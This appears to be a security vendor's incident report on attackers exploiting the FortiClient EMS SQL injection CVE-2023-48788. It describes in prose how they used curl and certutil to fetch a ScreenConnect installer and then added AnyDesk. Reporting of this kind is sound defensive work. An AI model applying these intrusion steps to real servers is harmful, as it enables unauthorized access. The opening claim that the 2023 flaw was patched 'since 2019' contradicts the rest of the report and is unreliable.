Attackers are exploiting a FortiClient EMS vulnerability that was already patched and available since 2019.
The vulnerability in question is an improper filtering of SQL command input, making the system vulnerable to SQL injection and affects Fortinet FortiClient EMS versions 7.0.1 to 7.0.10 and 7.2.0 to 7.2.2.
If successfully exploited, attackers can execute unauthorized code or commands by sending specially crafted data packets, endangering users across various regions.
The attackers used our client’s exposed Windows server running FortiClient EMS over the internet as the initial point of attack.
They utilized a curl command to download an installer for the ScreenConnect remote access application.
Additionally, they used the Windows native binary certutil tool to facilitate the same action, ultimately storing the downloaded installer as 'update.exe' in the root of the C: drive.
After installation, the attackers uploaded payloads to the compromised system to begin discovery and lateral movement activities, as well as generating further persistence via remote control tools such as AnyDesk.
While further tracking this threat on October 23, 2024, GERT analysts detected active attempts to exploit CVE-2023-48788 in the wild by executing a similar command.
The analysis of this incident helped us establish that the techniques currently used by the attackers to deploy remote access tools are constantly being updated and growing in complexity.
We strongly recommend always installing an EPP agent on every host running an OS and configuring additional controls like Application Control.